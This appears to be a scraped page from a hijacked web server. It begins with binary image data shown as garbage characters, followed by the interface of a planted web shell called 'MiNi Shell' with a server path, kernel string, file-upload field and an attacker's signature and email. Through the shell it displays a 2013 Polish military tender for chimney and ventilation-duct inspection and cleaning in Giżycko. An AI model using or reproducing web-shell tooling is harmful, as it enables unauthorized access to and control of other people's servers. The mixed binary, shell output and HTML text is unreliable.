JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/42524-N-2013.html

<p class="kh_header"><b>Giżycko: USŁUGA W ZAKRESIE OKRESOWEJ KONTROLI PRZEWODÓW KOMINOWYCH, DYMNYCH, SPALINOWYCH I WENTYLACYJNYCH, CZOPUCHÓW ORAZ PODŁĄCZEŃ DO PRZEWODÓW W KOTŁOWNIACH ORAZ OKRESOWEGO CZYSZCZENIA PRZEWODÓW DYMOWYCH, SPALINOWYCH ORAZ WENTYLACYJNYCH NA TERENIE KOMPLEKSÓW BĘDĄCYCH 
W ADMINISTRACJI JEDNOSTKI WOJSKOWEJ NR 4352 W GIŻYCKU</b><br>
<b>Numer ogłoszenia: 42524 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA W ZAKRESIE OKRESOWEJ KONTROLI PRZEWODÓW KOMINOWYCH, DYMNYCH, SPALINOWYCH I WENTYLACYJNYCH, CZOPUCHÓW ORAZ PODŁĄCZEŃ DO PRZEWODÓW W KOTŁOWNIACH ORAZ OKRESOWEGO CZYSZCZENIA PRZEWODÓW DYMOWYCH, SPALINOWYCH ORAZ WENTYLACYJNYCH NA TERENIE KOMPLEKSÓW BĘDĄCYCH 
W ADMINISTRACJI JEDNOSTKI WOJSKOWEJ NR 4352 W GIŻYCKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
okresowe czyszczenie przewodów dymowych, spalinowych, wentylacyjnych 
i czopuchów wraz z usunięciem, wywiezieniem i unieszkodliwieniem zanieczyszczeń w obiektach Sekcji Obsługi Infrastruktury Giżycko, Suwałki, Gołdap, Bemowo Piskie 
i Węgorzewo, w rejonie działania Jednostki Wojskowej Nr 4352 Giżycko oraz okresowa kontrola przewodów kominowych spalinowych, dymowych 
i wentylacyjnych, czopuchów oraz sprawdzenie prawidłowości podłączeń w kotłowniach na terenie kompleksów wojskowych obsługiwanych przez Sekcję Obsługi Infrastruktury w m.: Bemowo Piskie, Brożówka, Gołdap, Giżycko, Mrągowo, Szelment i Węgorzewo.

Kod klasyfikacji CPV:
90912000-3 Usługi czyszczenia konstrukcji rurowych.
90915000-4 Usługi czyszczenia pieców i kominów.
2.	Zamawiający dopuszcza możliwość składania ofert częściowych:
a.	Zadanie nr 1 - okresowe czyszczenie przewodów dymowych, spalinowych, wentylacyjnych i czopuchów wraz z usunięciem, wywiezieniem 
i unieszkodliwieniem zanieczyszczeń w obiektach Sekcji Obsługi Infrastruktury Giżycko, Suwałki, Gołdap, Bemowo Piskie i Węgorzewo, w rejonie działania Jednostki Wojskowej Nr 4352 Giżycko, określonych w załączniku nr 1 do siwz:

1	Zakres usługi:
a	Przewody dymowe i czopuchy - 2 614,50 m2 x 4 czyszczenia w roku 
1 raz na kwartał,
b	Przewody spalinowe i czopuchy - 143,27 m2 x 2 czyszczenia w roku po jednym w II i IV kwartale,
c	Przewody wentylacyjne - 1 275,00 m2 x 1 czyszczenie w roku w III kwartale.

2	Dodatkowe informacje:
a	Okresowe czyszczenie Wykonawca winien wykonać zgodnie z rozdziałem 7 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji 
z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów Dz. U. z 2010 Nr 109 poz. 719, w obiektach wykazanych w załączniku nr 1 do siwz.
b	Częstotliwość okresowego czyszczenia przewodów spalinowych 
i wentylacyjnych oraz czopuchów musi być zgodna z załącznikiem nr 1 do siwz.
c	Każdorazowa czynność czyszczenia przewodów spalinowych 
i wentylacyjnych oraz czopuchów musi być odnotowana w Książce czyszczenia przewodów kominowych oraz Wykonawca winien sporządzić na tą okoliczność protokół odbioru, podpisany przez strony, wraz 
z wykazem wykonanych czynności jako załącznik do prawidłowo wystawionej faktury VAT.
d	Wykonawca biorący udział w postępowaniu musi posiadać kwalifikacje mistrza w rzemiośle kominiarskim oraz prowadzić zarejestrowaną działalność gospodarczą. Potwierdzenie w zakresie kwalifikacji przedstawi Zamawiającemu najpóźniej w dniu podpisania umowy Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, pod rygorem odstąpienia od podpisania umowy.

b.	Zadanie nr 2 - Okresowa kontrola przewodów kominowych spalinowych, dymowych i wentylacyjnych, czopuchów oraz sprawdzenie prawidłowości podłączeń w kotłowniach na terenie kompleksów wojskowych obsługiwanych przez SOI w m.: Bemowo Piskie, Brożówka, Gołdap, Giżycko, Mrągowo, Szelment i  Węgorzewo, zgodnie z załącznikiem nr 2 do siwz:

1	Zakres usługi:
a	sprawdzenie drożności przewodów kominowych - 3.757,19 m2,
b	sprawdzenie podłączeń urządzeń do przewodów - 140 szt.

2	Warunki realizacji zadania:
a	Realizacja robót w godzinach 7.00 - 15.30.
b	Roboty będą prowadzone na terenie użytkowanym czynny zakład.

3	Lokalizacja robót:
a	Roboty realizowane będą w kompleksach wojskowych zamkniętych.
4	Warunki organizacyjno - techniczne:
a	Przy wykonywaniu okresowej kontroli przewodów kominowych należy uwzględnić wymagania zawarte w obowiązujących przepisach.
b Wykonawca po wykonaniu zadania dostarczy Zamawiającemu protokoły 
z okresowej kontroli przewodów kominowych dymowych, spalinowych 
i wentylacyjnych, czopuchów oraz podłączeń do przewodów, oddzielnie na każdy obiekt.
3.	Wizja lokalna:
Zamawiający przewiduje możliwość dokonania wizji lokalnej w celu zapoznania się ze stanem istniejących przewodów kominowych oraz sprawdzenia wszelkich informacji o warunkach, w których Wykonawca będzie realizował przedmiot zamówienia, w terminie od 31.01.2013r. do 05.01.2013r. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej z właściwym Kierownikiem Sekcji Obsługi Infrastruktury:
a.	Pan Bogusław Borowiec, Giżycko          - tel. 87 4294767,
b.	Pan Jerzy Gontowski, Bemowo Piskie   - tel. 87 4372220,
c.	Pan Leszek Lemiesz, Suwałki                 -tel. 87 5669466,
d.	Pan  Marek Podsiad, Gołdap                   -tel. 87 6156476,
e.	Pan Franciszek Zaleski, Węgorzewo      - tel. 87 4295259. 
Koszt takiej wizyty ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.20.00-3, 90.91.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia w/w warunki, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp - załącznik nr 6 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia w/w warunki, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp - załącznik nr 6 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia w/w warunki, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp - załącznik nr 6 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia w/w warunki, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp - załącznik nr 6 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia w/w warunki, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp - załącznik nr 6 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ? wypełniony i podpisany z wykorzystaniem wzoru - Załącznik nr 3 do siwz); ZESTAWIENIE KOSZTÓW WYKONANIA USŁUGI wypełnione i podpisane (załącznik nr 4 lub/ i 5 do SIWZ); PEŁNOMOCNICTWA osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Niedopuszczalna jest pod rygorem nieważności istotna zmiana niniejszej umowy oraz wprowadzanie do niej takich postanowień, które byłyby niekorzystne dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, 
na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem:
a.	wysokości zobowiązania, określonego w § 3 ust. 1  i 2 umowy, w przypadku zmiany stawki podatku od towarów i usług w latach 2013 - 2015.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl, http://www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU, Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek sztabowy pok. 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 09:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek sztabowy pok. 109..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> okresowe czyszczenie przewodów dymowych, spalinowych, wentylacyjnych i czopuchów wraz z usunięciem, wywiezieniem 
i unieszkodliwieniem zanieczyszczeń w obiektach Sekcji Obsługi Infrastruktury Giżycko, Suwałki, Gołdap, Bemowo Piskie i Węgorzewo, w rejonie działania Jednostki Wojskowej Nr 4352 Giżycko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zakres usługi:
a)	Przewody dymowe i czopuchy - 2 614,50 m2 x 4 czyszczenia w roku 
(1 raz na kwartał),
b)	Przewody spalinowe i czopuchy - 143,27 m2 x 2 czyszczenia w roku (po jednym w II i IV kwartale),
c)	Przewody wentylacyjne - 1 275,00 m2 x 1 czyszczenie w roku (w III kwartale.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Okresowa kontrola przewodów kominowych spalinowych, dymowych i wentylacyjnych, czopuchów oraz sprawdzenie prawidłowości podłączeń w kotłowniach na terenie kompleksów wojskowych obsługiwanych przez SOI w m.: Bemowo Piskie, Brożówka, Gołdap, Giżycko, Mrągowo, Szelment i  Węgorzewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zakres usługi:
a)	sprawdzenie drożności przewodów kominowych - 3.757,19 m2,
b)	sprawdzenie podłączeń urządzeń do przewodów - 140 szt.

2)	Warunki realizacji zadania:
a)	Realizacja robót w godzinach 7.00 - 15.30.
b)	Roboty będą prowadzone na terenie użytkowanym (czynny zakład).

3)	Lokalizacja robót:
a)	Roboty realizowane będą w kompleksach wojskowych zamkniętych.

4)	Warunki organizacyjno - techniczne:
a)	Przy wykonywaniu okresowej kontroli przewodów kominowych należy uwzględnić wymagania zawarte w obowiązujących przepisach.
b)	Wykonawca po wykonaniu zadania dostarczy Zamawiającemu protokoły 
z okresowej kontroli przewodów kominowych dymowych, spalinowych 
i wentylacyjnych, czopuchów oraz podłączeń do przewodów, oddzielnie na każdy obiekt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com